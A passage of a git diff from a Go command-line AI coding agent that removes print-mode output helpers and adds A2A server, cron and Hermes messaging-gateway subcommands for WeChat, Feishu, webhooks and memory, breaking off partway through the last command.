-	if compactionSettings.KeepRecentTokens == 0 {
-		compactionSettings.KeepRecentTokens = 20000
-	}
-
-	agentCfg := agent.Config{
-		Provider:           p,
-		Model:              model,
-		Mode:               mode,
-		ThinkingLevel:      thinkingLevel,
-		MaxTokens:          settings.MaxOutputTokens,
-		Settings:           settings,
-		Session:            sess,
-		ExtraContext:       extraContext,
-		CompactionSettings: compactionSettings,
-		MultiAgent:         multiAgent,
-	}
-
-	a := agent.New(agentCfg, registry)
-	if multiAgent && agentMgr != nil {
-		agentMgr.Register(agent.NewAgentAdapter(a))
-	}
-
-	ctx := context.Background()
-	eventCh := a.Run(ctx, input)
-
-	var textBuffer strings.Builder
-
-	err = agent.ConsumeEvents(ctx, eventCh, agent.EventHandlerFunc(func(_ context.Context, event agent.Event) error {
-		switch event.Type {
-		case agent.EventToolApprovalRequest:
-			return fmt.Errorf("tool approval required in print mode for %s; rerun interactively, use --mode yolo, or whitelist the command", event.ApprovalTool)
-		case agent.EventTextDelta:
-			textBuffer.WriteString(event.TextDelta)
-		case agent.EventToolCall:
-			// Flush text buffer before tool call
-			if textBuffer.Len() > 0 {
-				flushTextBuffer(&textBuffer, renderer)
-			}
-			fmt.Fprintf(os.Stderr, "\n[tool: %s]\n", event.ToolCall.Name)
-		case agent.EventToolExecutionStart:
-			fmt.Fprintf(os.Stderr, "[running: %s] ", event.ToolName)
-		case agent.EventToolExecutionEnd:
-			if event.ToolError != nil {
-				fmt.Fprintf(os.Stderr, "error: %v\n", event.ToolError)
-			} else {
-				fmt.Fprintf(os.Stderr, "done\n")
-			}
-		case agent.EventToolResult:
-			// Show full tool result for bash commands
-			if event.ToolName == "bash" {
-				fmt.Fprintf(os.Stderr, "\n%s\n", event.ToolResult)
-			} else if event.ToolDiff != nil {
-				fmt.Fprintf(os.Stderr, "\n[change: %s] +%d -%d (-%s +%s)\n",
-					event.ToolDiff.Path,
-					event.ToolDiff.Added,
-					event.ToolDiff.Deleted,
-					formatLineRanges(event.ToolDiff.DeletedLines),
-					formatLineRanges(event.ToolDiff.AddedLines),
-				)
-			}
-		case agent.EventPlanUpdate:
-			if event.Plan != nil {
-				fmt.Fprintf(os.Stderr, "\n%s\n", formatTaskPlan(event.Plan))
-			}
-		case agent.EventDone:
-			// Flush remaining text buffer
-			if textBuffer.Len() > 0 {
-				flushTextBuffer(&textBuffer, renderer)
-			}
-			// Show context usage
-			if event.ContextUsage != nil && event.ContextUsage.Percent != nil {
-				fmt.Fprintf(os.Stderr, "\nContext: %.1f%%/%s\n",
-					*event.ContextUsage.Percent,
-					formatTokenCount(event.ContextUsage.ContextWindow))
-			}
-		case agent.EventError:
-			// Flush text buffer before error
-			if textBuffer.Len() > 0 {
-				flushTextBuffer(&textBuffer, renderer)
-			}
-			if event.Error != nil {
-				return event.Error
-			}
-		case agent.EventUsage:
-			if event.ContextUsage != nil && event.ContextUsage.Percent != nil {
-				fmt.Fprintf(os.Stderr, "Context: %.1f%%/%s | ",
-					*event.ContextUsage.Percent,
-					formatTokenCount(event.ContextUsage.ContextWindow))
-			}
-			if event.Usage != nil {
-				cacheInfo := ""
-				if info := event.Usage.CacheInfo(); info != "" {
-					cacheInfo = " | " + info
-				}
-				fmt.Fprintf(os.Stderr, "Tokens: %d↓/%d↑ $%.4f%s\n",
-					event.Usage.TotalInputTokens(), event.Usage.Output, event.Usage.Cost.Total, cacheInfo)
-			}
-		case agent.EventCompactionStart:
-			fmt.Fprintf(os.Stderr, "\n⏳ Compacting context...\n")
-		case agent.EventCompactionEnd:
-			if event.Error != nil {
-				fmt.Fprintf(os.Stderr, "Compaction failed: %v\n", event.Error)
-			} else if event.StatusMessage != "" {
-				fmt.Fprintf(os.Stderr, "✅ %s\n", event.StatusMessage)
-			} else {
-				fmt.Fprintf(os.Stderr, "✅ Context compacted\n")
-			}
-		}
-		return nil
-	}))
-	if err != nil {
-		return err
-	}
-
-	return nil
-}
-
-func formatTaskPlan(plan *tools.TaskPlan) string {
-	if plan == nil || len(plan.Steps) == 0 {
-		return "Plan updated."
-	}
-	var sb strings.Builder
-	title := plan.Title
-	if title == "" {
-		title = "Plan"
-	}
-	sb.WriteString(title)
-	for _, step := range plan.Steps {
-		sb.WriteString("\n")
-		sb.WriteString(fmt.Sprintf("%s %s", planStatusMarker(step.Status), step.Title))
-	}
-	if plan.Note != "" {
-		sb.WriteString("\nnote: " + plan.Note)
-	}
-	return sb.String()
+// a2aDispatcherAdapter adapts a2a.A2AManager to tools.A2ADispatcher.
+type a2aDispatcherAdapter struct {
+	mgr *a2a.A2AManager
 }
 
-func planStatusMarker(status string) string {
-	switch status {
-	case "running":
-		return ">"
-	case "done":
-		return "x"
-	case "failed":
-		return "!"
-	default:
-		return "-"
+func (a *a2aDispatcherAdapter) List() []tools.AgentEntry {
+	entries := a.mgr.List()
+	result := make([]tools.AgentEntry, len(entries))
+	for i, e := range entries {
+		result[i] = tools.AgentEntry{Name: e.Name, URL: e.URL}
 	}
+	return result
 }
 
-func formatLineRanges(lines []int) string {
-	if len(lines) == 0 {
-		return "none"
-	}
-	var ranges []string
-	start, prev := lines[0], lines[0]
-	for _, line := range lines[1:] {
-		if line == prev+1 {
-			prev = line
-			continue
-		}
-		ranges = append(ranges, formatLineRange(start, prev))
-		start, prev = line, line
-	}
-	ranges = append(ranges, formatLineRange(start, prev))
-	return strings.Join(ranges, ",")
-}
-
-func formatLineRange(start, end int) string {
-	if start == end {
-		return fmt.Sprintf("%d", start)
-	}
-	return fmt.Sprintf("%d-%d", start, end)
-}
-
-// flushTextBuffer renders and prints the accumulated text buffer.
-func flushTextBuffer(buffer *strings.Builder, renderer *glamour.TermRenderer) {
-	text := buffer.String()
-	buffer.Reset()
-
-	if renderer != nil {
-		rendered, err := renderer.Render(text)
-		if err != nil {
-			// Fallback to plain text
-			fmt.Print(text)
-		} else {
-			fmt.Print(rendered)
-		}
-	} else {
-		fmt.Print(text)
-	}
-}
-
-// formatTokenCount formats a token count for display.
-func formatTokenCount(count int) string {
-	if count < 1000 {
-		return fmt.Sprintf("%d", count)
-	}
-	if count < 10000 {
-		return fmt.Sprintf("%.1fk", float64(count)/1000)
-	}
-	if count < 1000000 {
-		return fmt.Sprintf("%dk", count/1000)
-	}
-	if count < 10000000 {
-		return fmt.Sprintf("%.1fM", float64(count)/1000000)
-	}
-	return fmt.Sprintf("%dM", count/1000000)
+func (a *a2aDispatcherAdapter) Dispatch(ctx context.Context, name, message string) (string, error) {
+	return a.mgr.Dispatch(ctx, name, message)
 }
diff --git a/cmd/vibecoding/main_a2a.go b/cmd/vibecoding/main_a2a.go
new file mode 100644
index 0000000..059191f
--- /dev/null
+++ b/cmd/vibecoding/main_a2a.go
@@ -0,0 +1,294 @@
+package main
+
+import (
+	"encoding/json"
+	"fmt"
+	"net/http"
+	"os"
+	"strings"
+	"time"
+
+	"github.com/spf13/cobra"
+
+	"github.com/startvibecoding/vibecoding/internal/a2a"
+	"github.com/startvibecoding/vibecoding/internal/agent"
+	"github.com/startvibecoding/vibecoding/internal/config"
+	"github.com/startvibecoding/vibecoding/internal/provider"
+	providerfactory "github.com/startvibecoding/vibecoding/internal/provider/factory"
+	"github.com/startvibecoding/vibecoding/internal/sandbox"
+	"github.com/startvibecoding/vibecoding/internal/tools"
+)
+
+// newA2ACommand builds the "a2a" command tree.
+func newA2ACommand() *cobra.Command {
+	var (
+		flagPort          int
+		flagWorkDir       string
+		flagProvider      string
+		flagModel         string
+		flagSandbox       bool
+		flagAuthToken     string
+		flagInitA2AConfig bool
+		flagForce         bool
+	)
+
+	a2aCmd := &cobra.Command{
+		Use:   "a2a",
+		Short: "Run the A2A (Agent-to-Agent) server",
+		Long:  "Start VibeCoding A2A Server — a JSON-RPC 2.0 endpoint for other agents to send tasks.",
+		RunE: func(cmd *cobra.Command, args []string) error {
+			if flagInitA2AConfig {
+				path, err := a2a.InitA2AConfig(flagForce)
+				if err != nil {
+					return err
+				}
+				fmt.Fprintf(os.Stderr, "Created a2a config: %s\n", path)
+				return nil
+			}
+			return cmd.Help()
+		},
+	}
+
+	a2aFlags := a2aCmd.Flags()
+	a2aFlags.BoolVar(&flagInitA2AConfig, "init-a2a-config", false, "Create a2a.json config template")
+	a2aFlags.BoolVar(&flagForce, "force", false, "Force overwrite existing files (used with --init-a2a-config)")
+
+	// --- start ---
+
+	startCmd := &cobra.Command{
+		Use:   "start",
+		Short: "Start the A2A server",
+		RunE: func(cmd *cobra.Command, args []string) error {
+			cfg := a2a.DefaultConfig()
+
+			if flagPort != 0 {
+				cfg.Port = flagPort
+			}
+			if flagWorkDir != "" {
+				cfg.WorkDir = flagWorkDir
+			}
+			if flagAuthToken != "" {
+				cfg.AuthToken = flagAuthToken
+			}
+
+			// Resolve working directory
+			if cfg.WorkDir == "" || cfg.WorkDir == "." {
+				cwd, err := os.Getwd()
+				if err != nil {
+					return fmt.Errorf("get working directory: %w", err)
+				}
+				cfg.WorkDir = cwd
+			}
+
+			// Load settings for provider
+			settings, err := config.LoadSettings()
+			if err != nil {
+				return fmt.Errorf("load settings: %w", err)
+			}
+
+			providerName := flagProvider
+			if providerName == "" {
+				providerName = settings.DefaultProvider
+			}
+			modelID := flagModel
+			if modelID == "" {
+				modelID = settings.DefaultModel
+			}
+
+			// Create provider (lazy import to avoid circular deps)
+			// For now, we use a simple factory that wraps the agent creation
+			factory := &simpleAgentFactory{
+				settings: settings,
+				provider: providerName,
+				model:    modelID,
+				workDir:  cfg.GetWorkDir(),
+				sandbox:  flagSandbox,
+			}
+
+			executor := a2a.NewDefaultExecutor(factory)
+			return a2a.Run(cfg, version, executor)
+		},
+	}
+
+	startFlags := startCmd.Flags()
+	startFlags.IntVar(&flagPort, "port", 0, "Listen port (default: 8093)")
+	startFlags.StringVar(&flagWorkDir, "work-dir", "", "Default working directory")
+	startFlags.StringVarP(&flagProvider, "provider", "p", "", "Default provider name")
+	startFlags.StringVarP(&flagModel, "model", "m", "", "Default model ID")
+	startFlags.BoolVar(&flagSandbox, "sandbox", false, "Enable sandbox mode (bwrap)")
+	startFlags.StringVar(&flagAuthToken, "auth-token", "", "Bearer token for authentication")
+
+	// --- stop ---
+
+	stopCmd := &cobra.Command{
+		Use:   "stop",
+		Short: "Stop the A2A server",
+		RunE: func(cmd *cobra.Command, args []string) error {
+			// Reuse hermes PID file pattern but for A2A
+			// For simplicity, use HTTP health check
+			cfg := a2a.DefaultConfig()
+			url := fmt.Sprintf("http://%s/.well-known/agent.json", cfg.GetListenAddr())
+			client := &http.Client{Timeout: 2 * time.Second}
+			_, err := client.Get(url)
+			if err != nil {
+				return fmt.Errorf("A2A server is not running (cannot reach %s)", url)
+			}
+			fmt.Fprintf(os.Stderr, "A2A server is running at %s\n", cfg.GetListenAddr())
+			fmt.Fprintf(os.Stderr, "Note: Use Ctrl+C or kill the process to stop.\n")
+			return nil
+		},
+	}
+
+	// --- status ---
+
+	statusCmd := &cobra.Command{
+		Use:   "status",
+		Short: "Show A2A server status",
+		RunE: func(cmd *cobra.Command, args []string) error {
+			cfg := a2a.DefaultConfig()
+			url := fmt.Sprintf("http://%s/.well-known/agent.json", cfg.GetListenAddr())
+			client := &http.Client{Timeout: 2 * time.Second}
+			resp, err := client.Get(url)
+			if err != nil {
+				fmt.Fprintf(os.Stderr, "A2A server is not running (cannot reach %s)\n", url)
+				return nil
+			}
+			defer resp.Body.Close()
+
+			var card a2a.AgentCard
+			json.NewDecoder(resp.Body).Decode(&card)
+			fmt.Fprintf(os.Stderr, "A2A server is running at %s\n", cfg.GetListenAddr())
+			fmt.Fprintf(os.Stderr, "  Name: %s\n", card.Name)
+			fmt.Fprintf(os.Stderr, "  Version: %s\n", card.Version)
+			fmt.Fprintf(os.Stderr, "  Skills: %d\n", len(card.Skills))
+			for _, s := range card.Skills {
+				fmt.Fprintf(os.Stderr, "    - %s: %s\n", s.Name, s.Description)
+			}
+			return nil
+		},
+	}
+
+	// --- card ---
+
+	cardCmd := &cobra.Command{
+		Use:   "card",
+		Short: "Show or generate the Agent Card",
+		RunE: func(cmd *cobra.Command, args []string) error {
+			cfg := a2a.DefaultConfig()
+			card := a2a.DefaultAgentCard(version, fmt.Sprintf("http://%s", cfg.GetListenAddr()))
+			data, _ := json.MarshalIndent(card, "", "  ")
+			fmt.Println(string(data))
+			return nil
+		},
+	}
+
+	a2aCmd.AddCommand(startCmd, stopCmd, statusCmd, cardCmd)
+
+	// --- send ---
+
+	var flagTarget string
+
+	sendCmd := &cobra.Command{
+		Use:   "send <message>",
+		Short: "Send a message to an A2A server",
+		Args:  cobra.MinimumNArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			msg := strings.Join(args, " ")
+			target := flagTarget
+			if target == "" {
+				target = "http://localhost:8093"
+			}
+
+			client := a2a.NewClient(target, flagAuthToken)
+			task, err := client.SendMessage(cmd.Context(), "", &a2a.Message{
+				Role:  "user",
+				Parts: []a2a.MessagePart{{Type: "text", Text: msg}},
+			})
+			if err != nil {
+				return fmt.Errorf("send message: %w", err)
+			}
+
+			// Print response
+			if len(task.Artifacts) > 0 {
+				for _, a := range task.Artifacts {
+					for _, p := range a.Parts {
+						if p.Type == "text" {
+							fmt.Println(p.Text)
+						}
+					}
+				}
+			} else if task.Message != nil {
+				for _, p := range task.Message.Parts {
+					if p.Type == "text" {
+						fmt.Println(p.Text)
+					}
+				}
+			}
+			return nil
+		},
+	}
+	sendCmd.Flags().StringVar(&flagTarget, "target", "", "A2A server URL (default: http://localhost:8093)")
+	sendCmd.Flags().StringVar(&flagAuthToken, "auth-token", "", "Bearer token")
+
+	// --- discover ---
+
+	discoverCmd := &cobra.Command{
+		Use:   "discover <url>",
+		Short: "Discover an A2A server's Agent Card",
+		Args:  cobra.ExactArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			client := a2a.NewClient(args[0], flagAuthToken)
+			card, err := client.GetAgentCard(cmd.Context())
+			if err != nil {
+				return fmt.Errorf("discover: %w", err)
+			}
+			data, _ := json.MarshalIndent(card, "", "  ")
+			fmt.Println(string(data))
+			return nil
+		},
+	}
+
+	a2aCmd.AddCommand(sendCmd, discoverCmd)
+	return a2aCmd
+}
+
+// simpleAgentFactory creates agents for A2A task execution.
+// This bridges the a2a package to the agent package.
+type simpleAgentFactory struct {
+	settings *config.Settings
+	provider string
+	model    string
+	workDir  string
+	sandbox  bool
+}
+
+func (f *simpleAgentFactory) CreateForA2A(workDir string, mode string) (*agent.Agent, error) {
+	if workDir == "" {
+		workDir = f.workDir
+	}
+
+	p, model, err := createProviderForA2A(f.settings, f.provider, f.model)
+	if err != nil {
+		return nil, fmt.Errorf("create provider: %w", err)
+	}
+
+	sbMgr := sandbox.NewManager(workDir)
+	if f.sandbox {
+		sbMgr.SetLevel(sandbox.LevelStandard)
+	}
+
+	a := agent.New(agent.Config{
+		Provider:   p,
+		Model:      model,
+		Mode:       mode,
+		SandboxMgr: sbMgr,
+		Settings:   f.settings,
+	}, tools.NewRegistry(workDir, sbMgr.GetActive()))
+
+	return a, nil
+}
+
+// createProviderForA2A creates a provider for A2A task execution.
+func createProviderForA2A(settings *config.Settings, providerName, modelID string) (provider.Provider, *provider.Model, error) {
+	return providerfactory.Create(settings, providerName, modelID)
+}
diff --git a/cmd/vibecoding/main_cron.go b/cmd/vibecoding/main_cron.go
new file mode 100644
index 0000000..c2fb998
--- /dev/null
+++ b/cmd/vibecoding/main_cron.go
@@ -0,0 +1,34 @@
+package main
+
+import (
+	"fmt"
+	"path/filepath"
+
+	"github.com/startvibecoding/vibecoding/internal/config"
+	"github.com/startvibecoding/vibecoding/internal/cron"
+)
+
+// openCronStore opens the hermes cron store file.
+func openCronStore() *cron.FileCronStore {
+	path := filepath.Join(config.ConfigDir(), "hermes-cron.json")
+	return cron.NewFileCronStore(path)
+}
+
+// setCronEnabled enables or disables a cron job by ID.
+func setCronEnabled(id string, enabled bool) error {
+	store := openCronStore()
+	job, err := store.Get(id)
+	if err != nil {
+		return err
+	}
+	job.Enabled = enabled
+	if err := store.Update(*job); err != nil {
+		return err
+	}
+	state := "enabled"
+	if !enabled {
+		state = "disabled"
+	}
+	fmt.Printf("✅ %s: [%s] %s\n", state, job.ID, job.Name)
+	return nil
+}
diff --git a/cmd/vibecoding/main_hermes.go b/cmd/vibecoding/main_hermes.go
new file mode 100644
index 0000000..d780848
--- /dev/null
+++ b/cmd/vibecoding/main_hermes.go
@@ -0,0 +1,575 @@
+package main
+
+import (
+	"encoding/json"
+	"fmt"
+	"net/http"
+	"os"
+	"syscall"
+	"time"
+
+	"github.com/spf13/cobra"
+
+	"github.com/startvibecoding/vibecoding/internal/cron"
+	"github.com/startvibecoding/vibecoding/internal/hermes"
+	"github.com/startvibecoding/vibecoding/internal/memory"
+	"github.com/startvibecoding/vibecoding/internal/messaging/wechat"
+)
+
+// newHermesCommand builds the "hermes" command tree with all subcommands.
+func newHermesCommand() *cobra.Command {
+	var (
+		flagPort       int
+		flagWorkDir    string
+		flagConfig     string
+		flagProvider   string
+		flagModel      string
+		flagMultiAgent bool
+		flagSandbox    bool
+		flagDaemon     bool
+		flagVerbose    bool
+		flagDebug      bool
+		flagForce      bool
+	)
+
+	hermesCmd := &cobra.Command{
+		Use:   "hermes",
+		Short: "Run the Hermes messaging gateway",
+		Long:  "Start VibeCoding Hermes — a messaging gateway with WebSocket/HTTP API, WeChat, Feishu, and more.",
+	}
+
+	// --- start / stop / status ---
+
+	startCmd := &cobra.Command{
+		Use:   "start",
+		Short: "Start the Hermes daemon",
+		RunE: func(cmd *cobra.Command, args []string) error {
+			return hermes.Run(hermes.RunOptions{
+				ConfigPath: flagConfig,
+				Port:       flagPort,
+				WorkDir:    flagWorkDir,
+				Provider:   flagProvider,
+				Model:      flagModel,
+				MultiAgent: flagMultiAgent,
+				Sandbox:    flagSandbox,
+				Daemon:     flagDaemon,
+				Verbose:    flagVerbose,
+				Debug:      flagDebug,
+			}, version)
+		},
+	}
+
+	startFlags := startCmd.Flags()
+	startFlags.IntVar(&flagPort, "port", 0, "Listen port (default: from hermes.json or 8090)")
+	startFlags.StringVar(&flagWorkDir, "work-dir", "", "Default working directory")
+	startFlags.StringVar(&flagConfig, "config", "", "Path to hermes.json")
+	startFlags.StringVarP(&flagProvider, "provider", "p", "", "Default provider name (overrides hermes.json)")
+	startFlags.StringVarP(&flagModel, "model", "m", "", "Default model ID (overrides hermes.json)")
+	startFlags.BoolVar(&flagMultiAgent, "multi-agent", false, "Enable multi-agent mode (sub-agent tools)")
+	startFlags.BoolVar(&flagSandbox, "sandbox", false, "Enable sandbox mode (bwrap)")
+	startFlags.BoolVarP(&flagDaemon, "daemon", "d", false, "Run in background")
+	startFlags.BoolVar(&flagVerbose, "verbose", false, "Verbose output")
+	startFlags.BoolVar(&flagDebug, "debug", false, "Enable debug logging")
+
+	stopCmd := &cobra.Command{
+		Use:   "stop",
+		Short: "Stop the Hermes daemon",
+		RunE: func(cmd *cobra.Command, args []string) error {
+			pid, err := hermes.ReadPIDFile()
+			if err != nil {
+				return fmt.Errorf("read PID file: %w", err)
+			}
+			if pid == 0 {
+				return fmt.Errorf("hermes is not running (no PID file found)")
+			}
+			proc, err := os.FindProcess(pid)
+			if err != nil {
+				return fmt.Errorf("find process %d: %w", pid, err)
+			}
+			if err := proc.Signal(syscall.SIGTERM); err != nil {
+				return fmt.Errorf("send SIGTERM to process %d: %w", pid, err)
+			}
+			fmt.Fprintf(os.Stderr, "Sent SIGTERM to hermes (PID %d)\n", pid)
+			return nil
+		},
+	}
+
+	statusCmd := &cobra.Command{
+		Use:   "status",
+		Short: "Show Hermes daemon status",
+		RunE: func(cmd *cobra.Command, args []string) error {
+			pid, err := hermes.ReadPIDFile()
+			if err != nil {
+				return fmt.Errorf("read PID file: %w", err)
+			}
+			if pid == 0 {
+				fmt.Fprintln(os.Stderr, "Hermes is not running (no PID file found)")
+				return nil
+			}
+			// Check if process is alive
+			proc, err := os.FindProcess(pid)
+			if err != nil {
+				fmt.Fprintf(os.Stderr, "Hermes PID %d: process not found\n", pid)
+				return nil
+			}
+			if err := proc.Signal(syscall.Signal(0)); err != nil {
+				fmt.Fprintf(os.Stderr, "Hermes PID %d: not running\n", pid)
+				return nil
+			}
+			fmt.Fprintf(os.Stderr, "Hermes is running (PID %d)\n", pid)
+
+			// Try to query HTTP status
+			cfg, err := hermes.LoadHermesConfig()
+			if err == nil {
+				url := fmt.Sprintf("http://%s/api/health", cfg.GetListenAddr())
+				client := &http.Client{Timeout: 2 * time.Second}
+				resp, err := client.Get(url)
+				if err == nil {
+					defer resp.Body.Close()
+					var health map[string]any
+					json.NewDecoder(resp.Body).Decode(&health)
+					if v, ok := health["version"]; ok {
+						fmt.Fprintf(os.Stderr, "  Version: %v\n", v)
+					}
+					if v, ok := health["uptime_seconds"]; ok {
+						fmt.Fprintf(os.Stderr, "  Uptime: %v seconds\n", v)
+					}
+				}
+			}
+			return nil
+		},
+	}
+
+	// --- config ---
+
+	configCmd := &cobra.Command{
+		Use:   "config",
+		Short: "Manage Hermes configuration",
+	}
+
+	var flagProject, flagGlobal, flagWebhook bool
+
+	configInitCmd := &cobra.Command{
+		Use:   "init",
+		Short: "Create hermes.json config template",
+		RunE: func(cmd *cobra.Command, args []string) error {
+			if flagProject && flagGlobal {
+				return fmt.Errorf("--project and --global are mutually exclusive")
+			}
+			if flagWebhook {
+				path, err := hermes.InitWebhookConfig(flagProject, flagForce)
+				if err != nil {
+					return err
+				}
+				fmt.Fprintf(os.Stderr, "Created webhook config: %s\n", path)
+				fmt.Fprintf(os.Stderr, "\nSample routes:\n")
+				fmt.Fprintf(os.Stderr, "  POST /webhook/github  — GitHub events (push, pull_request, issues)\n")
+				fmt.Fprintf(os.Stderr, "  POST /webhook/ci      — CI events (all types)\n")
+				fmt.Fprintf(os.Stderr, "\nSet WEBHOOK_SECRET env var or replace ${WEBHOOK_SECRET} in config.\n")
+				return nil
+			}
+			path, err := hermes.InitHermesConfig(flagProject, flagForce)
+			if err != nil {
+				return err
+			}
+			fmt.Fprintf(os.Stderr, "Created hermes config: %s\n", path)
+			return nil
+		},
+	}
+
+	configInitCmd.Flags().BoolVar(&flagProject, "project", false, "Write to .vibe/hermes.json")
+	configInitCmd.Flags().BoolVar(&flagGlobal, "global", false, "Write to global hermes.json (default)")
+	configInitCmd.Flags().BoolVar(&flagForce, "force", false, "Overwrite existing file")
+	configInitCmd.Flags().BoolVar(&flagWebhook, "webhook", false, "Include sample webhook routes (GitHub, CI)")
+
+	configShowCmd := &cobra.Command{
+		Use:   "show",
+		Short: "Show current effective configuration",
+		RunE: func(cmd *cobra.Command, args []string) error {
+			cfg, err := hermes.LoadHermesConfig()
+			if err != nil {
+				return err
+			}
+			data, _ := json.MarshalIndent(cfg, "", "  ")
+			fmt.Println(string(data))
+			return nil
+		},
+	}
+
+	configCmd.AddCommand(configInitCmd, configShowCmd)
+
+	// --- client ---
+
+	var flagURL, flagSession string
+
+	clientCmd := &cobra.Command{
+		Use:   "client",
+		Short: "Connect to a running Hermes instance via WebSocket",
+		RunE: func(cmd *cobra.Command, args []string) error {
+			return hermes.RunClient(hermes.ClientOptions{
+				URL:       flagURL,
+				SessionID: flagSession,
+			})
+		},
+	}
+	clientCmd.Flags().StringVar(&flagURL, "url", "ws://localhost:8090/ws", "WebSocket URL to connect to")
+	clientCmd.Flags().StringVar(&flagSession, "session", "", "Session ID to resume")
+
+	// --- wechat ---
+
+	wechatCmd := &cobra.Command{
+		Use:   "wechat",
+		Short: "Manage WeChat iLink connection",
+	}
+
+	wechatLoginCmd := &cobra.Command{
+		Use:   "login",
+		Short: "Login to WeChat via QR code",
+		RunE: func(cmd *cobra.Command, args []string) error {
+			cfg, err := hermes.LoadHermesConfig()
+			if err != nil {
+				return err
+			}
+			credPath := cfg.GetWechatCredPath()
+			client := wechat.NewClient()
+			_, err = wechat.Login(cmd.Context(), client, wechat.LoginOptions{
+				CredPath: credPath,
+				Force:    flagForce,
+			})
+			if err != nil {
+				return err
+			}
+			fmt.Fprintf(os.Stderr, "WeChat credentials saved to %s\n", credPath)
+			return nil
+		},
+	}
+	wechatLoginCmd.Flags().BoolVar(&flagForce, "force", false, "Force re-login even if credentials exist")
+
+	wechatStatusCmd := &cobra.Command{
+		Use:   "status",
+		Short: "Show WeChat connection status",
+		RunE: func(cmd *cobra.Command, args []string) error {
+			cfg, err := hermes.LoadHermesConfig()
+			if err != nil {
+				return err
+			}
+			credPath := cfg.GetWechatCredPath()
+			creds, err := wechat.LoadCredentials(credPath)
+			if err != nil || creds == nil {
+				fmt.Fprintln(os.Stderr, "WeChat: not logged in")
+				fmt.Fprintf(os.Stderr, "  Run: vibecoding hermes wechat login\n")
+				return nil
+			}
+			fmt.Fprintf(os.Stderr, "WeChat: logged in\n")
+			fmt.Fprintf(os.Stderr, "  UserID: %s\n", creds.UserID)
+			fmt.Fprintf(os.Stderr, "  AccountID: %s\n", creds.AccountID)
+			fmt.Fprintf(os.Stderr, "  SavedAt: %s\n", creds.SavedAt)
+			fmt.Fprintf(os.Stderr, "  CredPath: %s\n", credPath)
+			return nil
+		},
+	}
+
+	wechatCmd.AddCommand(wechatLoginCmd, wechatStatusCmd)
+
+	// --- feishu ---
+
+	feishuCmd := &cobra.Command{
+		Use:   "feishu",
+		Short: "Manage Feishu (Lark) connection",
+	}
+
+	feishuSetupCmd := &cobra.Command{
+		Use:   "setup",
+		Short: "Configure Feishu app credentials",
+		RunE: func(cmd *cobra.Command, args []string) error {
+			fmt.Fprintln(os.Stderr, "Configure Feishu app credentials in hermes.json:")
+			fmt.Fprintln(os.Stderr, "")
+			fmt.Fprintln(os.Stderr, `  "feishu": {`)
+			fmt.Fprintln(os.Stderr, `    "enabled": true,`)
+			fmt.Fprintln(os.Stderr, `    "app_id": "cli_xxxx",`)
+			fmt.Fprintln(os.Stderr, `    "app_secret": "xxxx"`)
+			fmt.Fprintln(os.Stderr, `  }`)
+			fmt.Fprintln(os.Stderr, "")
+			fmt.Fprintln(os.Stderr, "Or set environment variables: FEISHU_APP_ID, FEISHU_APP_SECRET")
+			fmt.Fprintln(os.Stderr, "")
+			fmt.Fprintln(os.Stderr, "Steps:")
+			fmt.Fprintln(os.Stderr, "  1. Go to https://open.feishu.cn → Create App")
+			fmt.Fprintln(os.Stderr, "  2. Enable Bot capability")
+			fmt.Fprintln(os.Stderr, "  3. Subscribe to im.message.receive_v1 event")
+			fmt.Fprintln(os.Stderr, "  4. Copy App ID and App Secret to hermes.json")
+			return nil
+		},
+	}
+
+	feishuStatusCmd := &cobra.Command{
+		Use:   "status",
+		Short: "Show Feishu connection status",
+		RunE: func(cmd *cobra.Command, args []string) error {
+			cfg, err := hermes.LoadHermesConfig()
+			if err != nil {
+				return err
+			}
+			if !cfg.Feishu.Enabled {
+				fmt.Fprintln(os.Stderr, "Feishu: disabled")
+				return nil
+			}
+			if cfg.Feishu.AppID == "" || cfg.Feishu.AppSecret == "" {
+				fmt.Fprintln(os.Stderr, "Feishu: enabled but not configured")
+				fmt.Fprintln(os.Stderr, "  Run: vibecoding hermes feishu setup")
+				return nil
+			}
+			fmt.Fprintln(os.Stderr, "Feishu: configured")
+			fmt.Fprintf(os.Stderr, "  AppID: %s\n", cfg.Feishu.AppID)
+			fmt.Fprintf(os.Stderr, "  WorkDir: %s\n", cfg.GetPlatformWorkDir("feishu"))
+			return nil
+		},
+	}
+
+	feishuCmd.AddCommand(feishuSetupCmd, feishuStatusCmd)
+
+	// --- cron ---
+
+	cronCmd := newCronCommand()
+
+	// --- assemble ---
+
+	hermesCmd.AddCommand(startCmd, stopCmd, statusCmd, configCmd, clientCmd, wechatCmd, feishuCmd, cronCmd)
+
+	// --- webhook ---
+
+	webhookCmd := &cobra.Command{
+		Use:   "webhook",
+		Short: "Manage webhook routes",
+	}
+
+	webhookListCmd := &cobra.Command{
+		Use:   "list",
+		Short: "List configured webhook routes",
+		RunE: func(cmd *cobra.Command, args []string) error {
+			cfg, err := hermes.LoadHermesConfig()
+			if err != nil {
+				return err
+			}
+			if !cfg.Webhooks.Enabled {
+				fmt.Println("Webhooks: disabled")
+				return nil
+			}
+			if len(cfg.Webhooks.Routes) == 0 {
+				fmt.Println("No webhook routes configured.")
+				return nil
+			}
+			fmt.Printf("Webhooks: enabled (secret: %v)\n", cfg.Webhooks.Secret != "")
+			for _, r := range cfg.Webhooks.Routes {
+				events := "*"
+				if len(r.Events) > 0 {
+					events = fmt.Sprintf("%v", r.Events)
+				}
+				delivery := r.Delivery
+				if r.DeliveryTarget != "" {
+					delivery = fmt.Sprintf("%s:%s", r.Delivery, r.DeliveryTarget)
+				}
+				fmt.Printf("  POST /webhook%s  events=%s  skill=%s  delivery=%s\n", r.Path, events, r.Skill, delivery)
+			}
+			return nil
+		},
+	}
+
+	webhookCmd.AddCommand(webhookListCmd)
+
+	// --- memory ---
+
+	memoryCmd := &cobra.Command{
+		Use:   "memory",
+		Short: "Manage persistent memory",
+	}
+
+	memoryShowCmd := &cobra.Command{
+		Use:   "show",
+		Short: "Show current memory.md content",
+		RunE: func(cmd *cobra.Command, args []string) error {
+			cfg, err := hermes.LoadHermesConfig()
+			if err != nil {
+				return err
+			}
+			cfg.GetWorkDir() // ensure work dir resolved
+			store := memory.NewStore(cfg.Memory.Path, cfg.GetWorkDir())
+			content, path, source, err := store.Read()
+			if err != nil {
+				return err
+			}
+			if content == "" {
+				fmt.Println("No memory file found.")
+				return nil
+			}
+			fmt.Fprintf(os.Stderr, "Source: %s — %s\n\n", source, path)
+			fmt.Println(content)
+			return nil
+		},
+	}
+
+	memoryClearCmd := &cobra.Command{
+		Use:   "clear",
+		Short: "Clear memory.md content",
